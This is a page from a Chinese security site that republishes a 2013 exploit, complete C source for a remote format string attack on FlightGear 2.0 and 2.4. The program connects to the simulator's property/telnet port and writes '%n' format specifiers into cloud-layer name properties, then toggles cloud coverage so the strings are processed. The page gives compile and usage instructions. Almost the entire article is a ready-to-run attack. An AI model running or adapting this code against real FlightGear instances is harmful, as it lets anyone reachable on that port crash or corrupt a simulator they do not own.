首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Flightgear 2.0, 2.4 - Remote Format String Exploit
来源:http://kuronosec.blogspot.com 作者:Kurono 发布时间:2013-05-09  

/*
# Exploit Title: Flightgear remote format string
# Date: 21/04/2013
# Exploit Author: Kurono
# email: andresgomezram7@gmail.com
# Vendor Homepage: http://www.flightgear.org/
# Software Link: http://www.flightgear.org/download/
# Version: Tested on versions 2.0, 2.4.
# Tested on: Windows (Linux user assisted)
# CVE : None

    Flightgear allows remote control through Property tree.
    It is vulnerable to remote format string vulnerability
    when some special parameters related with clouds are changed.
    To test this exploit, run Flightgear with remote input, for example:

    fgfs.exe --fg-root="C:\Program Files\FlightGear 2.4.0\data" --props=5501 --disable-real-weather-fetch

    or

    fgfs.exe --fg-root="C:\Program Files\FlightGear 2.4.0\data" --telnet=5501 --disable-real-weather-fetch   

    gcc -O2 -g -pedantic -Wall poc.c -o poc
    USAGE: ./poc [hostname [port]]

    More information: http://kuronosec.blogspot.com/
*/

#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <stdarg.h>
#include <string.h>


#define DFLTHOST "127.0.0.1"
#define DFLTPORT 5501
#define MAXMSG  256
#define fgfsclose close


void init_sockaddr(struct sockaddr_in *name, const char *hostname, unsigned port);
int fgfswrite(int sock, char *msg, ...);
const char *fgfsread(int sock, int wait);
void fgfsflush(int sock);

 

int fgfswrite(int sock, char *msg, ...)
{
 va_list va;
 ssize_t len;
 char buf[MAXMSG];

 va_start(va, msg);
 vsnprintf(buf, MAXMSG - 2, msg, va);
 va_end(va);
 printf("SEND: \t<%s>\n", buf);
 strcat(buf, "\015\012");

 len = write(sock, buf, strlen(buf));
 if (len < 0) {
  perror("fgfswrite");
  exit(EXIT_FAILURE);
 }
 return len;
}

 

const char *fgfsread(int sock, int timeout)
{
 static char buf[MAXMSG];
 char *p;
 fd_set ready;
 struct timeval tv;
 ssize_t len;

 FD_ZERO(&ready);
 FD_SET(sock, &ready);
 tv.tv_sec = timeout;
 tv.tv_usec = 0;
 if (!select(32, &ready, 0, 0, &tv))
  return NULL;

 len = read(sock, buf, MAXMSG - 1);
 if (len < 0) {
  perror("fgfsread");
  exit(EXIT_FAILURE);
 }
 if (len == 0)
  return NULL;

 for (p = &buf[len - 1]; p >= buf; p--)
  if (*p != '\015' && *p != '\012')
   break;
 *++p = '\0';
 return strlen(buf) ? buf : NULL;
}

 

void fgfsflush(int sock)
{
 const char *p;
 while ((p = fgfsread(sock, 0)) != NULL) {
  printf("IGNORE: \t<%s>\n", p);
 }
}

 

int fgfsconnect(const char *hostname, const int port)
{
 struct sockaddr_in serv_addr;
 struct hostent *hostinfo;
 int sock;

 sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
 if (sock < 0) {
  perror("fgfsconnect/socket");
  return -1;
 }

 hostinfo = gethostbyname(hostname);
 if (hostinfo == NULL) {
  fprintf(stderr, "fgfsconnect: unknown host: \"%s\"\n", hostname);
  close(sock);
  return -2;
 }

 serv_addr.sin_family = AF_INET;
 serv_addr.sin_port = htons(port);
 serv_addr.sin_addr = *(struct in_addr *)hostinfo->h_addr;

 if (connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) {
  perror("fgfsconnect/connect");
  close(sock);
  return -3;
 }
 return sock;
}

 

int main(int argc, char **argv)
{
 int sock;
 unsigned port;
 const char *hostname, *p;
        int i;

 hostname = argc > 1 ? argv[1] : DFLTHOST;
 port = argc > 2 ? atoi(argv[2]) : DFLTPORT;

 sock = fgfsconnect(hostname, port);
 if (sock < 0)
  return EXIT_FAILURE;

 fgfswrite(sock, "data");
        fgfswrite(sock, "set /sim/rendering/clouds3d-enable true");
        fgfswrite(sock, "set /environment/clouds");

        for (i=0; i < 5; i++) {
  fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/cu/cloud/name %%n", i);
  fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/cb/cloud/name %%n", i);
  fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/ac/cloud/name %%n", i);
  fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/st/cloud/name %%n", i);
  fgfswrite(sock, "set /environment/cloudlayers/layers[%d]/ns/cloud/name %%n", i);
        }
 
 p = fgfsread(sock, 3);
 if (p != NULL)
  printf("READ: \t<%s>\n", p);


        for (i=0; i < 5; i++) {
  fgfswrite(sock, "set /environment/clouds/layer[%d]/coverage scattered", i);
  fgfswrite(sock, "set /environment/clouds/layer[%d]/coverage cirrus", i);
  fgfswrite(sock, "set /environment/clouds/layer[%d]/coverage clear", i);
        }

        p = fgfsread(sock, 3);
 if (p != NULL)
  printf("READ: \t<%s>\n", p);

 fgfswrite(sock, "quit");
 fgfsclose(sock);
 return EXIT_SUCCESS;
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ColdFusion 9 / 10 Remote Root
·Linux Kernel open-time Capabil
·MoinMelt Arbitrary Command Exe
·ERS Viewer 2011 ERS File Handl
·Dovecot with Exim sender_addre
·Lan Messenger sending PM Buffe
·Microsoft Internet Explorer CG
·SAP SOAP RFC SXPG_COMMAND_EXEC
·Huawei SNMPv3 Buffer Overflow
·SAP SOAP RFC SXPG_CALL_SYSTEM
·AudioCoder .M3U Buffer Overflo
·No-IP Dynamic Update Client (D
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved